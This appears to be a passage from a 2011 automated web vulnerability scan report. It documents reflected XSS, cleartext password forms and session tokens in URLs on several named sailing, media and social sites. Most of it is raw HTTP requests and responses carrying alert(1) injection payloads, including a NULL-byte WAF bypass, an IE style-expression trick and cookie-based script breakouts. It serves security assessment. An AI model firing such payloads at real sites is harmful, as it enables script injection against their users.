Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/actualite/breves/detail43a5a--><script>alert(1)</script>e94251ccb77/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:45:20 GMT Server: Apache Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web10; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!-- inclusion de la gestion des channel ...[SNIP]... <!-- /en/actualite/breves/ VS /en/actualite/breves/detail43a5a--><script>alert(1)</script>e94251ccb77/ => ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 971b0"><script>alert(1)</script>e6293bdbb82 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/actualite/breves/detail971b0"><script>alert(1)</script>e6293bdbb82/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:45:20 GMT Server: Apache Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web10; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!-- inclusion de la gestion des channel ...[SNIP]... <a href="/es/actualite/breves/detail971b0"><script>alert(1)</script>e6293bdbb82/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55fb9"><script>alert(1)</script>bbeb226c99d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-807255fb9"><script>alert(1)</script>bbeb226c99d HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:45:22 GMT Server: Apache Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web12; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!-- inclusion de la gestion des channel ...[SNIP]... <a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-807255fb9"><script>alert(1)</script>bbeb226c99d"> ...[SNIP]...
3.26. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99434"><script>alert(1)</script>13356a1850f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?99434"><script>alert(1)</script>13356a1850f=1 HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 20 Jan 2011 00:45:10 GMT Server: Apache Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web11; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!-- inclusion de la gestion des channel ...[SNIP]... <a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?99434"><script>alert(1)</script>13356a1850f=1"> ...[SNIP]...
3.27. http://www.beneteaucountdown.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.beneteaucountdown.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a28b5"><script>alert(1)</script>18006edac7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a28b5\"><script>alert(1)</script>18006edac7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a28b5"><script>alert(1)</script>18006edac7b=1 HTTP/1.1 Host: www.beneteaucountdown.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00993e4"><script>alert(1)</script>a3764319929 was submitted in the cat parameter. This input was echoed as 993e4\"><script>alert(1)</script>a3764319929 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /news/newsList.php?cat=2%00993e4"><script>alert(1)</script>a3764319929 HTTP/1.1 Host: www.bymnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:45:32 GMT Server: Apache X-Powered-By: PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 50802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 325e2<script>alert(1)</script>bd2a273b0b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /onlinepubs325e2<script>alert(1)</script>bd2a273b0b1/009629399/apdxa.htm HTTP/1.1 Host: www.opengroup.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:50:23 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 4266
The value of REST URL parameter 1 is copied into an HTML comment. The payload e9577--><script>alert(1)</script>c9731df4bc1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /onlinepubse9577--><script>alert(1)</script>c9731df4bc1/009629399/apdxa.htm HTTP/1.1 Host: www.opengroup.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:50:25 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 4272
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e900a<script>alert(1)</script>bb50ef10f66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /onlinepubs/009629399e900a<script>alert(1)</script>bb50ef10f66/apdxa.htm HTTP/1.1 Host: www.opengroup.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:50:30 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 4266
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8440e--><script>alert(1)</script>525d718c1d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /onlinepubs/0096293998440e--><script>alert(1)</script>525d718c1d7/apdxa.htm HTTP/1.1 Host: www.opengroup.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:50:32 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 4272
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cb23c<script>alert(1)</script>f1cdaa4a54a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /onlinepubs/009629399/apdxa.htmcb23c<script>alert(1)</script>f1cdaa4a54a HTTP/1.1 Host: www.opengroup.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:50:36 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 4266
The value of REST URL parameter 3 is copied into an HTML comment. The payload 12c6e--><script>alert(1)</script>401b79155a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /onlinepubs/009629399/apdxa.htm12c6e--><script>alert(1)</script>401b79155a5 HTTP/1.1 Host: www.opengroup.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:50:38 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 4272
3.35. http://www.sailinganarchy.com/article_submission.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sailinganarchy.com
Path:
/article_submission.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33633"><script>alert(1)</script>e31b4d359f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article_submission.php/33633"><script>alert(1)</script>e31b4d359f HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:24:08 GMT Server: Apache Vary: User-Agent Content-Length: 4013 Connection: close Content-Type: text/html
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 324c3"style%3d"x%3aexpression(alert(1))"62d09b53079 was submitted in the url parameter. This input was echoed as 324c3"style="x:expression(alert(1))"62d09b53079 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /submit?url=http://blip.tv/file/4639878324c3"style%3d"x%3aexpression(alert(1))"62d09b53079&name=file HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.37. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tuenti.com
Path:
/share
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28d01"><script>alert(1)</script>bbf652f7ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&28d01"><script>alert(1)</script>bbf652f7ee9=1 HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]... <form method="post" action="?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&28d01"><script>alert(1)</script>bbf652f7ee9=1" id="lang_form_1"> ...[SNIP]...
3.38. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tuenti.com
Path:
/share
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3749"><script>alert(1)</script>3ddc78bf4c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /share?e3749"><script>alert(1)</script>3ddc78bf4c7=1 HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 2005 04:59:59 GMT Content-Type: text/html Connection: close Date: Thu, 20 Jan 2011 00:51:29 GMT Content-Length: 39388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]... <form method="post" action="?e3749"><script>alert(1)</script>3ddc78bf4c7=1" id="lang_form_1"> ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7df6b"><script>alert(1)</script>ac4474858b9 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html7df6b"><script>alert(1)</script>ac4474858b9 HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 2005 04:59:59 GMT Content-Type: text/html Connection: close Date: Thu, 20 Jan 2011 00:51:32 GMT Content-Length: 39461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]... <form method="post" action="?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html7df6b"><script>alert(1)</script>ac4474858b9" id="lang_form_1"> ...[SNIP]...
The value of the eID request parameter is copied into the HTML document as plain text between tags. The payload 8d752<img%20src%3da%20onerror%3dalert(1)>fff5a8dd9fc was submitted in the eID parameter. This input was echoed as 8d752<img src=a onerror=alert(1)>fff5a8dd9fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /event_results_cumulative.cfm?eID=4088d752<img%20src%3da%20onerror%3dalert(1)>fff5a8dd9fc HTTP/1.1 Host: www.yachtscoring.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Invalid data 4088d752<img src=a onerror=alert(1)>fff5a8dd9fc for CFSQLTYPE CF_SQL_INTEGER. Connection: close Date: Thu, 20 Jan 2011 00:54:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=6963885;expires=Sat, 12-Jan-2041 00:54:31 GMT;path=/ Set-Cookie: CFTOKEN=55082400;expires=Sat, 12-Jan-2041 00:54:31 GMT;path=/ Set-Cookie: CFID=6963885;path=/ Set-Cookie: CFTOKEN=55082400;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> Invalid data 4088d752<img src=a onerror=alert(1)>fff5a8dd9fc for CFSQLTYPE CF_SQL_INTEGER. </h1> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9aed"%3balert(1)//1078342a1b4 was submitted in the cli cookie. This input was echoed as e9aed";alert(1)//1078342a1b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.martini/;sz=728x90;net=cm;ord=3271752524;ord1=707118;cmpgurl=http%253A//www.sailinganarchy.com/index_page1.php? HTTP/1.1 Host: k.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3e9aed"%3balert(1)//1078342a1b4; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Thu, 20 Jan 2011 00:30:28 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:28 GMT Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:28 GMT Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Thu, 27-Jan-2011 00:30:28 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Thu, 20-Jan-2011 08:30:28 GMT Content-Length: 7906
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... </scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11d765b6a10b1b3e9aed";alert(1)//1078342a1b4&seg_code=noseg&ord=1295483428");CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif");CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&re ...[SNIP]...
4. Cleartext submission of passwordpreviousnext There are 7 instances of this issue:
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /index.php HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:36:56 GMT Server: Apache Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]... <td colspan='2' class='typo_login' align='center'> <form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '> ...[SNIP]... <input name="login" id='login' type="text" class="form" > psw <input name="psw" id='psw' type="password" class="form" > <input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.americascupmedia.com/index.php
The form contains the following password field:
psw
Request
GET /index.php HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:48 GMT Server: Apache Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]... <td colspan='2' class='typo_login' align='center'> <form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '> ...[SNIP]... <input name="login" id='login' type="text" class="form" > psw <input name="psw" id='psw' type="password" class="form" > <input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'> ...[SNIP]...
GET / HTTP/1.1 Host: www.regattaregatta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 20 Jan 2011 00:50:26 GMT Server: Microsoft-IIS/6.0 Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=f2f5e593b3e0e56bdba4d7906218ec7f; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Fri, 21-Jan-2011 00:50:26 GMT; path=/ X-Powered-By: PleskWin X-Powered-By: ASP.NET Date: Thu, 20 Jan 2011 00:50:26 GMT Connection: close
GET /velux_5_oceans_2010_race/ HTTP/1.1 Host: www.w-w-i.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; 